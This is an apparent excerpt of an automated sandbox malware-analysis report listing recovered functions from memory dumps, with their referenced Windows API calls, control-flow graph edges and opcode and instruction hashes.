                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c0f88a2049e0394b36234ae302a96e19c9717e81d96ec86b8cd287a266e755cd
                                            • Instruction ID: 14505bcc5761105383957de56853954e0c8a7f884b80fc8da8959a780d9eb5fa
                                            • Opcode Fuzzy Hash: c0f88a2049e0394b36234ae302a96e19c9717e81d96ec86b8cd287a266e755cd
                                            • Instruction Fuzzy Hash: 5651C0B5D103499FDB14CF9AC884ADEBFB5BF48310F65812EE818AB220D7749885CF90
                                            Function 014AA580 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2464 14aa580-14aa589 2465 14aa58b-14aa5b9 call 14a9f8c 2464->2465 2466 14aa5f1-14aa68c DuplicateHandle 2464->2466 2470 14aa5be-14aa5e4 2465->2470 2473 14aa68e-14aa694 2466->2473 2474 14aa695-14aa6b2 2466->2474 2470->2466 2473->2474
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AA67F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 19837f785b7f82f05f276b7554e9dc491a570da406716d03c120208c706e10c3
                                            • Instruction ID: 57ca62f1f9c2af6712891691d8c484d3764e584a3f45be7353eb15936807f2f4
                                            • Opcode Fuzzy Hash: 19837f785b7f82f05f276b7554e9dc491a570da406716d03c120208c706e10c3
                                            • Instruction Fuzzy Hash: D7415B76900248AFCF01CF99D844ADEBFF9FB58310F15806AE958A7361D335A915CFA4
                                            Function 014AA164 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2478 14aa164-14ab4f4 2481 14ab4fa-14ab4ff 2478->2481 2482 14ab5a4-14ab5c4 call 14a478c 2478->2482 2484 14ab552-14ab58a CallWindowProcW 2481->2484 2485 14ab501-14ab538 2481->2485 2489 14ab5c7-14ab5d4 2482->2489 2487 14ab58c-14ab592 2484->2487 2488 14ab593-14ab5a2 2484->2488 2491 14ab53a-14ab540 2485->2491 2492 14ab541-14ab550 2485->2492 2487->2488 2488->2489 2491->2492 2492->2489
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 014AB579
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: eaa319cecfb97af66a5e617cb529d9182ee8b25e3186d6d31af3af2ceebb3fcd
                                            • Instruction ID: 4c0ac8b72963dc49b7c8726d09cafb0a0fd84cf6201773d50918572d4cfce49c
                                            • Opcode Fuzzy Hash: eaa319cecfb97af66a5e617cb529d9182ee8b25e3186d6d31af3af2ceebb3fcd
                                            • Instruction Fuzzy Hash: EE4135B4900309CFDB14CF99C488AAABBF5FF98314F25C45AE559AB321C774A841CFA0
                                            Function 016B6170 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2495 16b6170-16b6d71 2498 16b6d79-16b6d83 2495->2498 2499 16b6d73-16b6d76 2495->2499 2500 16b6d8f-16b6dd1 RegQueryValueExW 2498->2500 2501 16b6d85-16b6d8d 2498->2501 2499->2498 2502 16b6dda-16b6e14 2500->2502 2503 16b6dd3-16b6dd9 2500->2503 2501->2500 2507 16b6e1e 2502->2507 2508 16b6e16 2502->2508 2503->2502 2509 16b6e1f 2507->2509 2508->2507 2509->2509
                                            APIs
                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 016B6DC1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 2ba5add083ef3c70760aa792f4613b43d797e87e8cda684e10043992f4d798f3
                                            • Instruction ID: 1162776094d2cc387ecf212bc7901b730e991d79838900b29f5ad0d62fd00428
                                            • Opcode Fuzzy Hash: 2ba5add083ef3c70760aa792f4613b43d797e87e8cda684e10043992f4d798f3
                                            • Instruction Fuzzy Hash: 2431CFB1D042589FDB20CF9AC884ADEBFF5BF48710F15802AE919AB350D7709985CFA0
                                            Function 016B6164 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 016B6B04
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: c273337f23af74ebd34cffc2ea241ccffbae2413fafda420dd892d5d9bd4511a
                                            • Instruction ID: d4702850faa30a4609ffcc7d55dfb3472ae3c6e8a4af7af7d4b33786b7e98faa
                                            • Opcode Fuzzy Hash: c273337f23af74ebd34cffc2ea241ccffbae2413fafda420dd892d5d9bd4511a
                                            • Instruction Fuzzy Hash: CE3100B09012488FDB10CF99C584ACEFFF5BB48304F24816AE509AB351C7759985CFA4
                                            Function 014AA5F0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AA67F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 4bd8f8e0537c8317d971aaa3bab1be3316bfcd0a5351c92ae11f968e8a28f960
                                            • Instruction ID: dbbcbc5b6aa33f7e768ac758ee7c4aaf7539802157e95e575cdec468cf7e2e5f
                                            • Opcode Fuzzy Hash: 4bd8f8e0537c8317d971aaa3bab1be3316bfcd0a5351c92ae11f968e8a28f960
                                            • Instruction Fuzzy Hash: 3A21E5B59002489FDB10CF9AD885BDEBBF4EB48310F15801AE958A7350D374A944CFA5
                                            Function 014AA5F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AA67F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 60a41f5a61bf2aac631f5e8503d614f8e1b07f465acc40c5de3909d057a8085a
                                            • Instruction ID: 6e52112560b24f039088c8680b0085089be80e0b8d14633a25cdd994472aa036
                                            • Opcode Fuzzy Hash: 60a41f5a61bf2aac631f5e8503d614f8e1b07f465acc40c5de3909d057a8085a
                                            • Instruction Fuzzy Hash: E721C4B59003489FDB10CFAAD884BDEBBF8FB48310F15841AE958A7350D374A954CFA5
                                            Function 014A5621 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014A56B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: c2f1b9536acaf57df14b54d536d387a5669afe9afe0964c3542b2ddf0744a5bd
                                            • Instruction ID: 794e5d529008ec397f7108d520cb00359a5874186c21c57f7ff0ffbeea94605b
                                            • Opcode Fuzzy Hash: c2f1b9536acaf57df14b54d536d387a5669afe9afe0964c3542b2ddf0744a5bd
                                            • Instruction Fuzzy Hash: 242160B58097858FDB11CFA9C4407DEFFF0AF46214F15859AC498A7352C338A545CFA5
                                            Function 014A36BC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014A56B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: f9de618b2bff90a6cc526cd20bf8864793faf01162357e11c3c6917143e6182a
                                            • Instruction ID: d23e698fd5c65f035cf86ea7c4aa927224c5837ea127b456367da7388d997cb5
                                            • Opcode Fuzzy Hash: f9de618b2bff90a6cc526cd20bf8864793faf01162357e11c3c6917143e6182a
                                            • Instruction Fuzzy Hash: 6D1120B58007498FDB10CF9AD444BDEFBF4AB88220F51842AD518BB310C374A545CFA5
                                            Function 01661298 Relevance: .8, Instructions: 809COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c56a4e77ab03b5aff5cee27be6221b6c974284bdaf5c897ecae264d5d7e15af
                                            • Instruction ID: dedd0b07f0457d17acb037b173f7e02f82af37ba40acd33e6900caeacecb0568
                                            • Opcode Fuzzy Hash: 2c56a4e77ab03b5aff5cee27be6221b6c974284bdaf5c897ecae264d5d7e15af
                                            • Instruction Fuzzy Hash: 7C723E70A002188FEB15DFA5C954B9EBBB6FB98310F1080AAD10A6B3A5DF359D85CF51
                                            Function 01667FE0 Relevance: .6, Instructions: 571COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b1a46bca7e6d43216b701e8eac619fe022b9152a5abe8726883d69e6b38fd91
                                            • Instruction ID: f85e9721d9b3eb1ec245ebc7eba50a8aca8675de50220b72394812ca32a0ef6a
                                            • Opcode Fuzzy Hash: 5b1a46bca7e6d43216b701e8eac619fe022b9152a5abe8726883d69e6b38fd91
                                            • Instruction Fuzzy Hash: 67329A74A003089FDB11DFB8E998AAD7BBAFF88310F108469E406DB365DB399D45CB51
                                            Function 0166B0D0 Relevance: .4, Instructions: 448COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b93a28ceeb7070c9ef6cad341b9d5ef77a01174c2dd1c82c579ebb2d4c08e506
                                            • Instruction ID: d0cadbc6d5262d9cf0a17ef48499560b14babdb8a4b1ffed62807aad61d1bbec
                                            • Opcode Fuzzy Hash: b93a28ceeb7070c9ef6cad341b9d5ef77a01174c2dd1c82c579ebb2d4c08e506
                                            • Instruction Fuzzy Hash: D2F1AC30B00205CFEB15DF69D9847AEBBFAAF84314F14816AE405EB395DB76CC458B91
                                            Function 016687A0 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9d75d98e9b2706f71b0622f82caeb491074768a1b5c38012b9d869dc41c76c3
                                            • Instruction ID: fb25bc60c310f51bd947ef2bfcdcad3b95f705c5a34e97b68610b8898e838073
                                            • Opcode Fuzzy Hash: c9d75d98e9b2706f71b0622f82caeb491074768a1b5c38012b9d869dc41c76c3
                                            • Instruction Fuzzy Hash: BCF17E70B493858FD7569B789C546A63BF99F92310F1A80FAD544CB3A3E778CC058B22
                                            Function 01661FD8 Relevance: .4, Instructions: 405COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1bf9015088d42f4bbf487c3afd8ebde21d786bbab88c9b7ffe61302e02efe0a6
                                            • Instruction ID: 13c50374a363c5e13f4e3476f3706880eb1513fca3bd08646e9440d3f515583b
                                            • Opcode Fuzzy Hash: 1bf9015088d42f4bbf487c3afd8ebde21d786bbab88c9b7ffe61302e02efe0a6
                                            • Instruction Fuzzy Hash: ECF12B75A006158FCB05CF6CD894AADBBFAFF98310B1A8069E515EB361CB31EC41CB64
                                            Function 07494F69 Relevance: .4, Instructions: 390COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75fd2b5a01682124a6d945e6173ebd243ea8d405b659a899de07459b92e393b8
                                            • Instruction ID: 6eda49ac92cde8061e17cbafc516bc5b232bf85ddc0e4cc321b627b634a366b8
                                            • Opcode Fuzzy Hash: 75fd2b5a01682124a6d945e6173ebd243ea8d405b659a899de07459b92e393b8
                                            • Instruction Fuzzy Hash: CAE17AB1E003098FDF15DFA9D8546EEFBB1EF89310F24856AD805AB390DB709946CB91
                                            Function 016601C8 Relevance: .3, Instructions: 267COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32946adae2bd9dc2dbc71576f55e4b42c5dbdd5a24d08db00255ad10293261c6
                                            • Instruction ID: cdf629af0b8b7a0e560d1b619681671ea7ddecd4ee8952249aadf4fdb60f7994
                                            • Opcode Fuzzy Hash: 32946adae2bd9dc2dbc71576f55e4b42c5dbdd5a24d08db00255ad10293261c6
                                            • Instruction Fuzzy Hash: 0FC1F570A00219DFDB25CF69C984AAEBBFAAF88314F148569F519AB361D730ED41CF50
                                            Function 0166A3E8 Relevance: .2, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c160b827c264df4346d4b721bc147ebc6cf4bf8e93d19f18f73ee8b4bede068f
                                            • Instruction ID: 1c6f84cec7e6ee6c7694a435cbd545a6587c86a616ec158f562272ded5b40ee5
                                            • Opcode Fuzzy Hash: c160b827c264df4346d4b721bc147ebc6cf4bf8e93d19f18f73ee8b4bede068f
                                            • Instruction Fuzzy Hash: A081CF30B053459FE716DBB99C54BAA7BF6AF85300F0484AAE508EB292DB35DD048B51
                                            Function 01662AF8 Relevance: .2, Instructions: 226COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fa58a0d442a9b75e68475db8ad740c72f118abb6d33a629837cf8810e5256
                                            • Instruction ID: 50c8a8e35dbb58dfb80cd07df5bcc3e9197b8f84171503f14720ce39dd958676
                                            • Opcode Fuzzy Hash: 693fa58a0d442a9b75e68475db8ad740c72f118abb6d33a629837cf8810e5256
                                            • Instruction Fuzzy Hash: B491A271A00215CFCB15CFA8C894A5EBBB9FF54310F0684ADE915AB366C731EC51CB91
                                            Function 074925C0 Relevance: .2, Instructions: 211COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8351b18089bf0b50e678d24d1ecaff9093bb6e2efc49927555bb79b9d0dedd28
                                            • Instruction ID: c472bf28e43325c4f85c70b61ca5a693871ca02f60c465e441225228dce590c9
                                            • Opcode Fuzzy Hash: 8351b18089bf0b50e678d24d1ecaff9093bb6e2efc49927555bb79b9d0dedd28
                                            • Instruction Fuzzy Hash: 22717AB1D0024A9FCF10DFA9D8846DEFBB1FF49310F10896AD949A7250E774A985CB91
                                            Function 01660F58 Relevance: .2, Instructions: 205COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b9fff066e8fe24ecd46244a1e15cb189ab5e320c7913072089804ec54b2c554
                                            • Instruction ID: 1b9ab3790799f4d6adba4a1f9be621459e95118971daa33083adf058e1e58156
                                            • Opcode Fuzzy Hash: 5b9fff066e8fe24ecd46244a1e15cb189ab5e320c7913072089804ec54b2c554
                                            • Instruction Fuzzy Hash: 8E615D30704155CFDB14DF3EDC84A6ABBEAAF86641B05406AE916CB361DF31EC42CB60
                                            Function 07491620 Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4ce2501b0a5d897f6a638825b3908ed3aecdb6acc416403a0cfb6382596ea72
                                            • Instruction ID: b7d8c7a85607e9cf719dfe0c62b7e5e212cea1c365ab5b0ba781a9f4ca08df73
                                            • Opcode Fuzzy Hash: d4ce2501b0a5d897f6a638825b3908ed3aecdb6acc416403a0cfb6382596ea72
                                            • Instruction Fuzzy Hash: F97158B1E0030A8FCB11DFA9C4446DEBFF5EF84210F24856AD509AB351DB75A94ACF91
                                            Function 0166FB10 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f8a56babf87bac239ccbb4b5043637ef8b846e09bdce8974d1188ddf12527ae
                                            • Instruction ID: 49060bf0fb7f6e62aeffa3927259b01666f912b8b99b39d7712c5321e4d14d8c
                                            • Opcode Fuzzy Hash: 3f8a56babf87bac239ccbb4b5043637ef8b846e09bdce8974d1188ddf12527ae
                                            • Instruction Fuzzy Hash: BC41C070B102069FCF11AFB8E8985DEBBF6EF88611B104529E906D7368DF749D018B94
                                            Function 01662D78 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c93844e8e0330ff8be9885f1b9e1965c3e9c203972561a5c036f2574f3ffc65
                                            • Instruction ID: 07d0c739a31e4576eb24027d6c21a9065a21bb2d9c3355b5337adad1cf8498a6
                                            • Opcode Fuzzy Hash: 7c93844e8e0330ff8be9885f1b9e1965c3e9c203972561a5c036f2574f3ffc65
                                            • Instruction Fuzzy Hash: A441BF313002558FDB16DF69ED28A6A7BEAEB84311F04846DE905CB3A1CB39CC51C751
                                            Function 01660D58 Relevance: .1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79b6f04ebfa27713f5331d3a116d251fb9d70bf0c4973c8a67cee4f29f073466
                                            • Instruction ID: 09f02bf2dae589a32a04fb65328491fb7630144f4303d246564d14a125d9b07e
                                            • Opcode Fuzzy Hash: 79b6f04ebfa27713f5331d3a116d251fb9d70bf0c4973c8a67cee4f29f073466
                                            • Instruction Fuzzy Hash: 5D4137756001299FDB15DF68DC98AAE7BB9FB48311F100069F916CB3A1CB71DD81CBA1
                                            Function 01668318 Relevance: .1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb854e214b3616cfd2c0fccf8df3fdfe36c276cf6ca7be6ffa0531e7d1eb44f
                                            • Instruction ID: 79bcd1e423a2627f910f8273413d8c1c38502b57be8450e89eccd52feb3ea0d7
                                            • Opcode Fuzzy Hash: dbb854e214b3616cfd2c0fccf8df3fdfe36c276cf6ca7be6ffa0531e7d1eb44f
                                            • Instruction Fuzzy Hash: 8E318B70B003058BDF259ABDDD9472EBB6EEB85710F204839D91AE7391DB35EC4487A2
                                            Function 0749172C Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e46b911999c1453974ce43c44dd517f2bd681551346b28fbfc3c8071660138a
                                            • Instruction ID: a921bc2043d4583ea28e879f24dc65687fe766a2c3dd5f130a33c9cfe43ace7d
                                            • Opcode Fuzzy Hash: 7e46b911999c1453974ce43c44dd517f2bd681551346b28fbfc3c8071660138a
                                            • Instruction Fuzzy Hash: 5941E1B1D0030DCBDB24CFA9C584ACEFBB5BF48314F24802AD508AB210D7756A8ACF91
                                            Function 0166FDC0 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f69940802de67a10c3631444b9aea053f31b7d0ecc1960b5106506f78fa720e8
                                            • Instruction ID: b127841b3aeff2cadd712fe0b026f42290e8e81cee936f6f1bf623d253a3ad3b
                                            • Opcode Fuzzy Hash: f69940802de67a10c3631444b9aea053f31b7d0ecc1960b5106506f78fa720e8
                                            • Instruction Fuzzy Hash: 6B31F230F012059FEB699A7EAD203BF2DA7ABC4620B64C5289516DB3D5EF31CC4287D5
                                            Function 01668C74 Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6fe4adc0012c1b9e6020b659778200d39a7630caee10f152bc584bef4ccc61e
                                            • Instruction ID: 38252ec9dc2bc6351f4a3fd57c509cebc287c8133e345472a203e2c6359ad9e1
                                            • Opcode Fuzzy Hash: c6fe4adc0012c1b9e6020b659778200d39a7630caee10f152bc584bef4ccc61e
                                            • Instruction Fuzzy Hash: E131D475B002059FDB55DF79D86466EBBFABF98640B148429D006EB398DF309D41CBA0
                                            Function 01668C80 Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3ccfe93d3d69077c2e4996dab7f4ed578f991cdf8e9e438201db889d1303f75
                                            • Instruction ID: bde9b472fbab4664411a5da44453c81ac079ddbd49d1e795d1887825595d28e7
                                            • Opcode Fuzzy Hash: e3ccfe93d3d69077c2e4996dab7f4ed578f991cdf8e9e438201db889d1303f75
                                            • Instruction Fuzzy Hash: 2031C431B002099FDB159F79D8686AEBBFABFD8650B148429D002EB394DF309C41CBA1
                                            Function 07491738 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2553f68675807957f451da0515ddb9c735b3d647346a6c40856352a5270c1ab9
                                            • Instruction ID: 668abe20e20288aad52171475dbea27c93d756d243bad600acabc3a6615e8bfd
                                            • Opcode Fuzzy Hash: 2553f68675807957f451da0515ddb9c735b3d647346a6c40856352a5270c1ab9
                                            • Instruction Fuzzy Hash: BC41A2B1D0074DDBDF24CFA9C584ADEFBB5AF48314F24802AD508AB250D7756A4ACF91
                                            Function 01661188 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b120344b2fd0f284dc1683032d517388616ca4d3b44799585c14882709d0b23
                                            • Instruction ID: 96c1e66423ba803fc474f97fe733cd1cf1615e5840252b2d5b3bcc82b7b18ecc
                                            • Opcode Fuzzy Hash: 4b120344b2fd0f284dc1683032d517388616ca4d3b44799585c14882709d0b23
                                            • Instruction Fuzzy Hash: 4E21D0703042048BEF1626AA8CA467F6A9FAFD6655F14C039D902CB395EF25CCC2A790
